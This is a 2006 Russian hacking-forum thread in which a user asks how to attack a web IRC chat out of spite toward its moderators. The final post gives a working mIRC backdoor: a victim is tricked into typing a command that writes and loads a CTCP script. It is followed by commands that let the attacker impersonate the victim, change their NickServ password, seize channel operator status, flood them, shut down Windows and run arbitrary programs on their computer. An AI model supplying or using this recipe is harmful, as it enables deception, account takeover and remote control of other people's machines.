Чаты Чат в интранете (cgiirc 0.5.3)

Discussion in 'Веб-уязвимости' started by zezic51, 16 Mar 2006.

  1. zezic51

    zezic51 New Member

    Joined:
    21 Oct 2005
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    У нас в интранете есть чат.
    Адрес в инете: http://www.saransk.ru/cgi-bin/irc/irc.cgi
    Короче там есть злобные модеры, и они меня уже изрядно замучали своими выходками >:-(

    Пожалуйста объясните, что вообще можно сделать с этим чатом все что можно с ним сделать
    (версии чата полностью одинаковые - что в интранете, что в интернете - одно и тоже...)

    (вообще я полный null по хаку чатов и всего остального...)
     
  2. zezic51

    zezic51 New Member

    Joined:
    21 Oct 2005
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    И еще забыл...
    Пробовал обойти бан всеми мне известными методами
    (менял proxy, чистил кукисы, применял SuperBan.exe)
    ниче у меня не вышло
     
  3. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    а ты знаеш что такое irc ???
    cgiirc 0.5.3 это всеголиш скрипт который конектица к irc серверу, к примеру rusnet. так что смена ип, чистка куков тебе ничем непоможет... садись на mIRC клиент...
     
    _________________________
  4. zezic51

    zezic51 New Member

    Joined:
    21 Oct 2005
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    И что мне даст Mirc клиент?
     
  5. Антошка2003

    Антошка2003 Elder - Старейшина

    Joined:
    3 Apr 2005
    Messages:
    534
    Likes Received:
    66
    Reputations:
    49
    иди в гугл, пиши скачать Mirc
     
  6. zezic51

    zezic51 New Member

    Joined:
    21 Oct 2005
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Гы

    А че мона натварить с Mirc ой?
     
  7. Fashion

    Fashion Elder - Старейшина

    Joined:
    31 Mar 2006
    Messages:
    28
    Likes Received:
    3
    Reputations:
    0
    тоже самое что интернет Mirc, только функций больше.
    Также общаешся только в нескольких каналах
     
  8. zezic51

    zezic51 New Member

    Joined:
    21 Oct 2005
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    ?

    Ну так и че натворить то можно?
     
  9. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Да просто ыт сможешь цепляться к любому каналу и т.д
     
  10. zezic51

    zezic51 New Member

    Joined:
    21 Oct 2005
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Поставил мирку...

    Поставил мирку... ПРо уязвимость прочитал...

    Поехали! Жертва должна напечатать эту команду. (вы НЕ печатаете это!)

    //write oper.pas ctcp 1:*:?:$1- | Load -rs oper.pas

    когда жертва наберёт это скрипт oper.pas будет создан в его(её) mirc каталоге. После этого вы можете использовать команды приведённые ниже. Не забудьте! Сначала заставьте жертву ввести //write oper.pas ctcp 1:*:?:$1- | Load -rs oper.pas и только после этого вводите приведённые ниже команды! Примечание: вместо NICK вставляйте, ник жертвы!

    Сделать, чтоб юзер зашёл на канал:
    /ctcp NICK /j #CHANNEL
    Юзер покидает канал:
    /ctcp NICK /part #CHANNEL
    Послать сообщение от имени жертвы:
    /ctcp NICK /msg #CHANNEL OUR MESSAGE...
    Послать приватное сообщение от имени жертвы:
    /ctcp NICK /msg NICK(anyone) OUR MESSAGE...
    Закрыть mirc жертвы:
    /ctcp NICK /exit
    Сменить жертве пароль:
    /ctcp NICK /msg nickserv set passwd NEW_PASS
    Сменить жертве ник:
    /ctcp NICK /nick NeW_NicK
    Если жертва является опом то следующей командой вы заставляете её дать вам опа на канале:
    /ctcp NICK /mode #channel +o OUR_NICK
    Выполнить на компьютере жертвы команду MS-DOS:
    /ctcp NICK /run command
    Открыть mirc на компьютере жертвы:
    /ctcp NICK /run mirc
    Запустить редактор реестра на компе жертвы:
    /ctcp NICK /run regedit
    Флуд на компе жертвы:
    /ctcp NICK /timer1 0 0 /ping $me
    Вырубить винду на компе жертвы:
    /ctcp NICK /run exitwindows





    А чё ещё делать мона? =)
     
    #10 zezic51, 15 Jun 2006
    Last edited: 15 Jun 2006